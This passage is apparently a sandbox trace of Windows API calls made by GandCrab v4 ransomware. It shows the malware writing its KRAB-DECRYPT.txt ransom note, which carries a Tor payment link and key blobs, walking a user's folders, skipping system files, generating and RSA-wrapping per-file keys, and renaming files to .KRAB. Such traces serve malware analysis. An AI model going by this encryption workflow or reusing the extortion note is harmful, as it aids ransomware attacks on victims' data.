7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0094.071] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338ed20, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338ed20*=0x1f6e, lpOverlapped=0x0) returned 1 [0094.072] CloseHandle (hObject=0x3a8) returned 1 [0094.072] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.073] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.122] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x29, wMilliseconds=0x143)) [0094.122] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.122] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.122] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.122] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\d2ca4a08d2ca4dee3d.lock") returned 72 [0094.122] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3a8 [0094.123] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.123] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.124] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\") returned 49 [0094.124] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\*" [0094.124] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\*", lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0xfbd920 [0094.124] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.124] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.124] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.124] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.124] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0094.124] lstrcmpW (lpString1="1F7Q0", lpString2=".") returned 1 [0094.124] lstrcmpW (lpString1="1F7Q0", lpString2="..") returned 1 [0094.124] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\", lpString2="1F7Q0" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0" [0094.124] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\" [0094.124] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0094.125] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.125] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0094.125] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0094.125] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0094.125] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.125] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.125] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\\\KRAB-DECRYPT.txt") returned 72 [0094.126] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x778 [0094.127] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0094.127] WriteFile (in: hFile=0x778, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338eaa0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338eaa0*=0x1f6e, lpOverlapped=0x0) returned 1 [0094.128] CloseHandle (hObject=0x778) returned 1 [0094.128] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.128] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.128] GetSystemTime (in: lpSystemTime=0x2f30400 | out: lpSystemTime=0x2f30400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x29, wMilliseconds=0x143)) [0094.128] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.129] GetWindowsDirectoryW (in: lpBuffer=0x2f50000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.129] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f50200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f50600, lpMaximumComponentLength=0x2f50608, lpFileSystemFlags=0x2f50604, lpFileSystemNameBuffer=0x2f50400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f50600*=0xd2ca4def, lpMaximumComponentLength=0x2f50608*=0xff, lpFileSystemFlags=0x2f50604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.129] wsprintfW (in: param_1=0x2f30000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2ca4a08d2ca4dee3d.lock") returned 78 [0094.129] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x778 [0094.130] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.130] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.130] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\") returned 55 [0094.130] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\*" [0094.130] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\*", lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0xfbd7a0 [0094.130] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.130] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.131] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.131] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.131] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.131] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0094.131] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0094.131] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2ca4a08d2ca4dee3d.lock" [0094.131] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.131] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 83 [0094.131] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2ca4a08d2ca4dee3d.lock") returned 78 [0094.131] lstrlenW (lpString=".lock") returned 5 [0094.131] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.137] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0094.138] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.138] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.138] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0094.138] lstrcmpW (lpString1="d2cnPMt Py.wav", lpString2=".") returned 1 [0094.138] lstrcmpW (lpString1="d2cnPMt Py.wav", lpString2="..") returned 1 [0094.139] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\", lpString2="d2cnPMt Py.wav" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav") returned="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav" [0094.139] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0094.139] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav.KRAB") returned 74 [0094.139] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav") returned 69 [0094.139] lstrlenW (lpString=".wav") returned 4 [0094.139] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.139] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".wav ") returned 5 [0094.139] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav") returned 69 [0094.140] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav") returned 69 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="desktop.ini") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="autorun.inf") returned 1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="ntuser.dat") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="iconcache.db") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="bootsect.bak") returned 1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="boot.ini") returned 1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="ntuser.dat.log") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="thumbs.db") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="KRAB-DECRYPT.html") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="KRAB-DECRYPT.txt") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="ntldr") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="NTDETECT.COM") returned -1 [0094.140] lstrcmpiW (lpString1="d2cnPMt Py.wav", lpString2="Bootfont.bin") returned 1 [0094.140] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0094.141] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0094.141] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.142] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.142] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.142] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338ea4c | out: pbBuffer=0x338ea4c) returned 1 [0094.142] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.142] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.142] CryptAcquireContextW (in: phProv=0x338e9b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9b4*=0x1010df8) returned 1 [0094.143] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0094.143] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0094.144] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0094.144] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338ea6c | out: pbBuffer=0x338ea6c) returned 1 [0094.144] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0094.144] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.144] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011238) returned 1 [0094.144] CryptImportKey (in: hProv=0x1011238, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbe0a0) returned 1 [0094.145] CryptGetKeyParam (in: hKey=0xfbe0a0, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.145] CryptEncrypt (in: hKey=0xfbe0a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.145] GetLastError () returned 0x0 [0094.145] CryptDestroyKey (hKey=0xfbe0a0) returned 1 [0094.145] CryptReleaseContext (hProv=0x1011238, dwFlags=0x0) returned 1 [0094.145] CryptAcquireContextW (in: phProv=0x338e9ac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e9ac*=0x1011678) returned 1 [0094.146] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e9b0 | out: phKey=0x338e9b0*=0xfbdb20) returned 1 [0094.146] CryptGetKeyParam (in: hKey=0xfbdb20, dwParam=0x8, pbData=0x338e9a4, pdwDataLen=0x338e9a8, dwFlags=0x0 | out: pbData=0x338e9a4*=0x800, pdwDataLen=0x338e9a8*=0x4) returned 1 [0094.146] CryptEncrypt (in: hKey=0xfbdb20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e9dc*=0x100) returned 1 [0094.146] GetLastError () returned 0x0 [0094.146] CryptDestroyKey (hKey=0xfbdb20) returned 1 [0094.146] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0094.146] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Music\\9FGr28gE\\oC1v6qnGcLk\\1F7Q0\\d2cnPMt Py.wav" (normalized: "c:\\users\\ciihmnxmn6ps\\music\\9fgr28ge\\oc1v6qngclk\\1f7q0\\d2cnpmt py.wav"), 